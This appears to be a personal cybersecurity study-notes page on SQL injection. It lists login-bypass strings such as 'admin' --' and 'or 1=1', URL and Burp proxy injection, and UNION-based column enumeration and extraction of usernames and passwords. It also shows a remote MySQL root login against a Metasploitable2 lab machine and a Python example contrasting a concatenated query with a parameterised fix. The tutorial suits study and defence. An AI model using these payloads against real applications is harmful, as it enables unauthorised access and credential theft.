Welcome To computerwebooo

A learning resource of Computer Programming and Cyber Security.

SQL Injection

$ mysql -u root -h 10.0.2.4

Command for remote access to a MySQL database, where -u is the user and -h is the host; here I am trying to access my Metasploitable2 machine.
Gifts'+OR+1=1--   (payload placed in a URL parameter to retrieve any data; spaces are URL-encoded as +)
----------------------------------------------------------------------------------------------
Default login statement       (# and -- are the two commenting methods)
SELECT * FROM account WHERE username='$admin' AND password='$password'
bypass via $password -------:   (1234' or 1=1 --), (1234' or 1=1 #)
We can also inject our code in the $admin parameter; then we don't need to supply any password.
injecting in $admin ------: (admin' #), (admin' --)
to get all usernames, write in the $admin field-----: (' or 1='1)

If the client looks secure because it applies a filter on the client side, it is easy to bypass using a proxy (Burp).
We simply don't type any special characters in the browser (use a random user and password), then apply the malicious code in the proxy (in the params) and forward the request.
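To show why the login statement above is bypassable and what the fix looks like, here is an added example (not from the original page) that builds the same query twice: once by string concatenation, once with bound parameters. It uses Python's sqlite3 with a constructed in-memory account table, so the comment form is -- (the # form is MySQL-specific), and passwords are kept in plaintext only to keep the injection point visible.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the page's `account` table (sample data, not real credentials).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO account VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def vulnerable_login(conn, username, password):
    """The page's login statement built by string concatenation.

    A quote in the input closes the literal early and '--' comments out the
    rest of the WHERE clause, so the password check never runs.
    """
    query = ("SELECT username FROM account WHERE username='%s' AND password='%s'"
             % (username, password))
    return [row[0] for row in conn.execute(query).fetchall()]


def safe_login(conn, username, password):
    """Same statement with bound parameters.

    The driver sends the values separately from the SQL text, so quotes,
    '--' and 'or 1=1' arrive as literal data and match nothing.
    """
    rows = conn.execute(
        "SELECT username FROM account WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, "admin' --", "wrong"))    # ['admin']: password check bypassed
    print(vulnerable_login(db, "x", "1234' or 1=1 --"))  # ['admin', 'alice']: every row
    print(safe_login(db, "admin' --", "wrong"))          # []: payload treated as a username
    print(safe_login(db, "admin", "s3cret"))             # ['admin']: normal login still works
```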
---------------------------------------------------------------------------------------------------

UNION ATTACK

# in a URL is %23
space ( ) in a URL is %20 (use it in Burp Suite's Repeater section in place of a space)
'$username' ORDER BY 1 #  
We can also use this instead of the ORDER BY statement; the number of NULLs should equal the number of columns.
' UNION SELECT NULL--
We can put the ORDER BY statement in the URL (because it is a GET request exploit) to learn the number of columns in the current database (the account table), like:
SELECT * FROM account WHERE username='$admin'  ORDER BY 5 #AND password='$password'
If this does not show an error, it means account has 5 columns; if we get an error, we try another number until it no longer errors.
' UNION SELECT NULL FROM DUAL--   In Oracle there must be a FROM clause in every SELECT statement; DUAL is built into the Oracle database, and in Oracle BANNER is used to show the database banner.


' UNION SELECT NULL,NULL,NULL,'a'--   used to find which columns hold a string type, by putting 'a' in each NULL position in turn

' UNION SELECT username, password FROM users--   to retrieve data from the users table if we know the column and table names

' UNION SELECT username || '~' || password FROM users--   to retrieve multiple values in a single column when the original query has only one string column
